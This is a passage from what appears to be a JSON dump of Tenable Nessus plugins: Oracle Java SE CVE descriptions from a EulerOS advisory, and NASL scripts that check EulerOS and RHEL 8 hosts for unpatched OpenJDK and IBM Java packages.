unauthorized ability to\n cause a partial denial of service (partial DOS) of Java\n SE, Java SE Embedded.(CVE-2019-2992)\n\n - Vulnerability in the Java SE product of Oracle Java SE\n (component: Javadoc). Supported versions that are\n affected are Java SE: 7u231, 8u221, 11.0.4 and 13.\n Difficult to exploit vulnerability allows\n unauthenticated attacker with network access via\n multiple protocols to compromise Java SE. 
Successful\n attacks require human interaction from a person other\n than the attacker and while the vulnerability is in\n Java SE, attacks may significantly impact additional\n products. Successful attacks of this vulnerability can\n result in unauthorized update, insert or delete access\n to some of Java SE accessible data as well as\n unauthorized read access to a subset of Java SE\n accessible data.(CVE-2019-2999)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Serialization). Supported\n versions that are affected are Java SE: 7u241, 8u231,\n 11.0.5 and 13.0.1 Java SE Embedded: 8u231. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2020-2583)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Security). Supported\n versions that are affected are Java SE: 7u241, 8u231,\n 11.0.5 and 13.0.1 Java SE Embedded: 8u231. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via Kerberos to compromise Java SE,\n Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized update, insert\n or delete access to some of Java SE, Java SE Embedded\n accessible data.(CVE-2020-2590)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Serialization). Supported\n versions that are affected are Java SE: 7u241, 8u231,\n 11.0.5 and 13.0.1 Java SE Embedded: 8u231. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. 
Successful\n attacks of this vulnerability can result in takeover of\n Java SE, Java SE Embedded.(CVE-2020-2604)\n\n - Vulnerability in the Java SE product of Oracle Java SE\n (component: Libraries). Supported versions that are\n affected are Java SE: 7u241, 8u231, 11.0.5 and 13.0.1.\n Difficult to exploit vulnerability allows\n unauthenticated attacker with network access via\n multiple protocols to compromise Java SE. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE.(CVE-2020-2654)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Networking). Supported\n versions that are affected are Java SE: 7u241 and 8u231\n Java SE Embedded: 8u231. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized ability to\n cause a partial denial of service (partial DOS) of Java\n SE, Java SE Embedded.(CVE-2020-2659)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Scripting). Supported\n versions that are affected are Java SE: 8u241, 11.0.6\n and 14 Java SE Embedded: 8u241. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized ability to\n cause a partial denial of service (partial DOS) of Java\n SE, Java SE Embedded.(CVE-2020-2754)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Scripting). Supported\n versions that are affected are Java SE: 8u241, 11.0.6\n and 14 Java SE Embedded: 8u241. 
Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized ability to\n cause a partial denial of service (partial DOS) of Java\n SE, Java SE Embedded.(CVE-2020-2755)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Serialization). Supported\n versions that are affected are Java SE: 7u251, 8u241,\n 11.0.6 and 14 Java SE Embedded: 8u241. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2020-2756)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Serialization). Supported\n versions that are affected are Java SE: 7u251, 8u241,\n 11.0.6 and 14 Java SE Embedded: 8u241. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2020-2757)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Security). Supported\n versions that are affected are Java SE: 7u251, 8u241,\n 11.0.6 and 14 Java SE Embedded: 8u241. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. 
Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2020-2773)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: JSSE). Supported versions\n that are affected are Java SE: 7u251, 8u241, 11.0.6 and\n 14 Java SE Embedded: 8u241. Easily exploitable\n vulnerability allows unauthenticated attacker with\n network access via HTTPS to compromise Java SE, Java SE\n Embedded. Successful attacks of this vulnerability can\n result in unauthorized ability to cause a partial\n denial of service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2020-2781)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Lightweight HTTP Server).\n Supported versions that are affected are Java SE:\n 7u251, 8u241, 11.0.6 and 14 Java SE Embedded: 8u241.\n Difficult to exploit vulnerability allows\n unauthenticated attacker with network access via\n multiple protocols to compromise Java SE, Java SE\n Embedded. Successful attacks of this vulnerability can\n result in unauthorized update, insert or delete access\n to some of Java SE, Java SE Embedded accessible data as\n well as unauthorized read access to a subset of Java\n SE, Java SE Embedded accessible data.(CVE-2020-2800)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Concurrency). Supported\n versions that are affected are Java SE: 7u251, 8u241,\n 11.0.6 and 14 Java SE Embedded: 8u241. Easily\n exploitable vulnerability allows unauthenticated\n attacker with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. 
Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2020-2830)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks require human interaction from a person other\n than the attacker. Successful attacks of this\n vulnerability can result in unauthorized update, insert\n or delete access to some of Java SE, Java SE Embedded\n accessible data.(CVE-2020-14798)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Serialization). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2020-14779)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: JNDI). Supported versions\n that are affected are Java SE: 7u271, 8u261, 11.0.8 and\n 15 Java SE Embedded: 8u261. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized read access to\n a subset of Java SE, Java SE Embedded accessible\n data.(CVE-2020-14781)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Hotspot). 
Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks require human interaction from a person other\n than the attacker. Successful attacks of this\n vulnerability can result in unauthorized update, insert\n or delete access to some of Java SE, Java SE Embedded\n accessible data as well as unauthorized read access to\n a subset of Java SE, Java SE Embedded accessible\n data.(CVE-2020-14792)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks require human interaction from a person other\n than the attacker. Successful attacks of this\n vulnerability can result in unauthorized read access to\n a subset of Java SE, Java SE Embedded accessible\n data.(CVE-2020-14796)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized update, insert or delete access to some of\n Java SE, Java SE Embedded accessible\n data.(CVE-2020-14797)\n\n - Vulnerability in the Java SE product of Oracle Java SE\n (component: Libraries). Supported versions that are\n affected are Java SE: 11.0.8 and 15. 
Easily exploitable\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE. Successful attacks of this vulnerability can\n result in unauthorized read access to a subset of Java\n SE accessible data.(CVE-2020-14803)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized update, insert or delete access to some of\n Java SE, Java SE Embedded accessible\n data.(CVE-2020-14782)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2021-1310\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fa787a18\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected java-1.8.0-openjdk packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/22\");\n\n script_set_attribute(attribute:\"plugin_type\", 
value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:java-1.8.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:java-1.8.0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:java-1.8.0-openjdk-headless\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(2)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") 
audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"java-1.8.0-openjdk-1.8.0.191.b12-0.h15\",\n \"java-1.8.0-openjdk-devel-1.8.0.191.b12-0.h15\",\n \"java-1.8.0-openjdk-headless-1.8.0.191.b12-0.h15\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"2\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.8.0-openjdk\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-20T14:09:42", "description": "The remote Redhat Enterprise Linux 8 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2021:0530 advisory.\n\n - OpenJDK: High memory usage during deserialization of Proxy class with many interfaces (Serialization,\n 8236862) (CVE-2020-14779)\n\n - OpenJDK: Missing permission check in path to URI conversion (Libraries, 8242680) (CVE-2020-14796)\n\n - OpenJDK: Incomplete check for invalid characters in URI to path conversion (Libraries, 8242685)\n (CVE-2020-14797)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 2, "cvss3": {"score": 3.7, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"}, "published": "2021-02-16T00:00:00", "title": "RHEL 8 : java-1.8.0-ibm (RHSA-2021:0530)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-14779", "CVE-2020-14797", "CVE-2020-14796"], "modified": "2021-02-16T00:00:00", "cpe": ["cpe:/a:redhat:enterprise_linux:8::crb", "p-cpe:/a:redhat:enterprise_linux:java-1.8.0-ibm-devel", "p-cpe:/a:redhat:enterprise_linux:java-1.8.0-ibm-plugin", "p-cpe:/a:redhat:enterprise_linux:java-1.8.0-ibm-demo", "p-cpe:/a:redhat:enterprise_linux:java-1.8.0-ibm", 
"cpe:/o:redhat:enterprise_linux:8::baseos", "cpe:/a:redhat:enterprise_linux:8::resilientstorage", "cpe:/a:redhat:enterprise_linux:8::appstream", "cpe:/a:redhat:enterprise_linux:8::sap_hana", "cpe:/a:redhat:enterprise_linux:8::sap", "cpe:/a:redhat:enterprise_linux:8::realtime", "p-cpe:/a:redhat:enterprise_linux:java-1.8.0-ibm-headless", "cpe:/a:redhat:enterprise_linux:8::nfv", "p-cpe:/a:redhat:enterprise_linux:java-1.8.0-ibm-webstart", "cpe:/o:redhat:enterprise_linux:8", "p-cpe:/a:redhat:enterprise_linux:java-1.8.0-ibm-jdbc", "cpe:/a:redhat:enterprise_linux:8::highavailability", "p-cpe:/a:redhat:enterprise_linux:java-1.8.0-ibm-src", "cpe:/a:redhat:enterprise_linux:8::supplementary"], "id": "REDHAT-RHSA-2021-0530.NASL", "href": "https://www.tenable.com/plugins/nessus/146533", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2021:0530. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146533);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/19\");\n\n script_cve_id(\"CVE-2020-14779\", \"CVE-2020-14796\", \"CVE-2020-14797\");\n script_xref(name:\"RHSA\", value:\"2021:0530\");\n\n script_name(english:\"RHEL 8 : java-1.8.0-ibm (RHSA-2021:0530)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 8 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2021:0530 advisory.\n\n - OpenJDK: High memory usage during deserialization of Proxy class with many interfaces (Serialization,\n 8236862) (CVE-2020-14779)\n\n - OpenJDK: Missing permission 
check in path to URI conversion (Libraries, 8242680) (CVE-2020-14796)\n\n - OpenJDK: Incomplete check for invalid characters in URI to path conversion (Libraries, 8242685)\n (CVE-2020-14797)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/20.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/770.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-14779\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-14796\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-14797\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2021:0530\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1889271\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1889697\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1889717\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-14797\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_cwe_id(20, 770);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/20\");\n script_set_attribute(attribute:\"patch_publication_date\", 
value:\"2021/02/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:8::baseos\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:enterprise_linux:8::appstream\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:enterprise_linux:8::crb\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:enterprise_linux:8::highavailability\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:enterprise_linux:8::nfv\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:enterprise_linux:8::realtime\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:enterprise_linux:8::resilientstorage\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:enterprise_linux:8::sap\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:enterprise_linux:8::sap_hana\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:enterprise_linux:8::supplementary\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.8.0-ibm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.8.0-ibm-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.8.0-ibm-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.8.0-ibm-headless\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.8.0-ibm-jdbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.8.0-ibm-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.8.0-ibm-src\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.8.0-ibm-webstart\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Red Hat' >!< release) audit(AUDIT_OS_NOT, 'Red Hat');\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '8')) audit(AUDIT_OS_NOT, 'Red Hat 8.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nrepositories = {\n 'enterprise_linux_8_appstream': [\n 'rhel-8-for-aarch64-appstream-debug-rpms',\n 'rhel-8-for-aarch64-appstream-rpms',\n 'rhel-8-for-aarch64-appstream-source-rpms',\n 'rhel-8-for-s390x-appstream-debug-rpms',\n 'rhel-8-for-s390x-appstream-rpms',\n 'rhel-8-for-s390x-appstream-source-rpms',\n 'rhel-8-for-x86_64-appstream-debug-rpms',\n 'rhel-8-for-x86_64-appstream-rpms',\n 'rhel-8-for-x86_64-appstream-source-rpms'\n ],\n 'enterprise_linux_8_baseos': [\n 
'rhel-8-for-aarch64-baseos-debug-rpms',\n 'rhel-8-for-aarch64-baseos-rpms',\n 'rhel-8-for-aarch64-baseos-source-rpms',\n 'rhel-8-for-s390x-baseos-debug-rpms',\n 'rhel-8-for-s390x-baseos-rpms',\n 'rhel-8-for-s390x-baseos-source-rpms',\n 'rhel-8-for-x86_64-baseos-debug-rpms',\n 'rhel-8-for-x86_64-baseos-rpms',\n 'rhel-8-for-x86_64-baseos-source-rpms'\n ],\n 'enterprise_linux_8_crb': [\n 'codeready-builder-for-rhel-8-aarch64-debug-rpms',\n 'codeready-builder-for-rhel-8-aarch64-eus-debug-rpms',\n 'codeready-builder-for-rhel-8-aarch64-eus-rpms',\n 'codeready-builder-for-rhel-8-aarch64-eus-source-rpms',\n 'codeready-builder-for-rhel-8-aarch64-rpms',\n 'codeready-builder-for-rhel-8-aarch64-source-rpms',\n 'codeready-builder-for-rhel-8-s390x-debug-rpms',\n 'codeready-builder-for-rhel-8-s390x-eus-debug-rpms',\n 'codeready-builder-for-rhel-8-s390x-eus-rpms',\n 'codeready-builder-for-rhel-8-s390x-eus-source-rpms',\n 'codeready-builder-for-rhel-8-s390x-rpms',\n 'codeready-builder-for-rhel-8-s390x-source-rpms',\n 'codeready-builder-for-rhel-8-x86_64-debug-rpms',\n 'codeready-builder-for-rhel-8-x86_64-eus-debug-rpms',\n 'codeready-builder-for-rhel-8-x86_64-eus-rpms',\n 'codeready-builder-for-rhel-8-x86_64-eus-source-rpms',\n 'codeready-builder-for-rhel-8-x86_64-rpms',\n 'codeready-builder-for-rhel-8-x86_64-source-rpms'\n ],\n 'enterprise_linux_8_highavailability': [\n 'rhel-8-for-aarch64-highavailability-debug-rpms',\n 'rhel-8-for-aarch64-highavailability-eus-debug-rpms',\n 'rhel-8-for-aarch64-highavailability-eus-rpms',\n 'rhel-8-for-aarch64-highavailability-eus-source-rpms',\n 'rhel-8-for-aarch64-highavailability-rpms',\n 'rhel-8-for-aarch64-highavailability-source-rpms',\n 'rhel-8-for-s390x-highavailability-debug-rpms',\n 'rhel-8-for-s390x-highavailability-eus-debug-rpms',\n 'rhel-8-for-s390x-highavailability-eus-rpms',\n 'rhel-8-for-s390x-highavailability-eus-source-rpms',\n 'rhel-8-for-s390x-highavailability-rpms',\n 'rhel-8-for-s390x-highavailability-source-rpms',\n 
'rhel-8-for-x86_64-highavailability-debug-rpms',\n 'rhel-8-for-x86_64-highavailability-e4s-debug-rpms',\n 'rhel-8-for-x86_64-highavailability-e4s-rpms',\n 'rhel-8-for-x86_64-highavailability-e4s-source-rpms',\n 'rhel-8-for-x86_64-highavailability-eus-debug-rpms',\n 'rhel-8-for-x86_64-highavailability-eus-rpms',\n 'rhel-8-for-x86_64-highavailability-eus-source-rpms',\n 'rhel-8-for-x86_64-highavailability-rpms',\n 'rhel-8-for-x86_64-highavailability-source-rpms',\n 'rhel-8-for-x86_64-highavailability-tus-debug-rpms',\n 'rhel-8-for-x86_64-highavailability-tus-rpms',\n 'rhel-8-for-x86_64-highavailability-tus-source-rpms'\n ],\n 'enterprise_linux_8_nfv': [\n 'rhel-8-for-x86_64-nfv-debug-rpms',\n 'rhel-8-for-x86_64-nfv-rpms',\n 'rhel-8-for-x86_64-nfv-source-rpms',\n 'rhel-8-for-x86_64-nfv-tus-debug-rpms',\n 'rhel-8-for-x86_64-nfv-tus-rpms',\n 'rhel-8-for-x86_64-nfv-tus-source-rpms'\n ],\n 'enterprise_linux_8_realtime': [\n 'rhel-8-for-x86_64-rt-debug-rpms',\n 'rhel-8-for-x86_64-rt-rpms',\n 'rhel-8-for-x86_64-rt-source-rpms',\n 'rhel-8-for-x86_64-rt-tus-debug-rpms',\n 'rhel-8-for-x86_64-rt-tus-rpms',\n 'rhel-8-for-x86_64-rt-tus-source-rpms'\n ],\n 'enterprise_linux_8_resilientstorage': [\n 'rhel-8-for-s390x-resilientstorage-debug-rpms',\n 'rhel-8-for-s390x-resilientstorage-eus-debug-rpms',\n 'rhel-8-for-s390x-resilientstorage-eus-rpms',\n 'rhel-8-for-s390x-resilientstorage-eus-source-rpms',\n 'rhel-8-for-s390x-resilientstorage-rpms',\n 'rhel-8-for-s390x-resilientstorage-source-rpms',\n 'rhel-8-for-x86_64-resilientstorage-debug-rpms',\n 'rhel-8-for-x86_64-resilientstorage-eus-debug-rpms',\n 'rhel-8-for-x86_64-resilientstorage-eus-rpms',\n 'rhel-8-for-x86_64-resilientstorage-eus-source-rpms',\n 'rhel-8-for-x86_64-resilientstorage-rpms',\n 'rhel-8-for-x86_64-resilientstorage-source-rpms'\n ],\n 'enterprise_linux_8_sap': [\n 'rhel-8-for-s390x-sap-netweaver-debug-rpms',\n 'rhel-8-for-s390x-sap-netweaver-eus-debug-rpms',\n 'rhel-8-for-s390x-sap-netweaver-eus-rpms',\n 
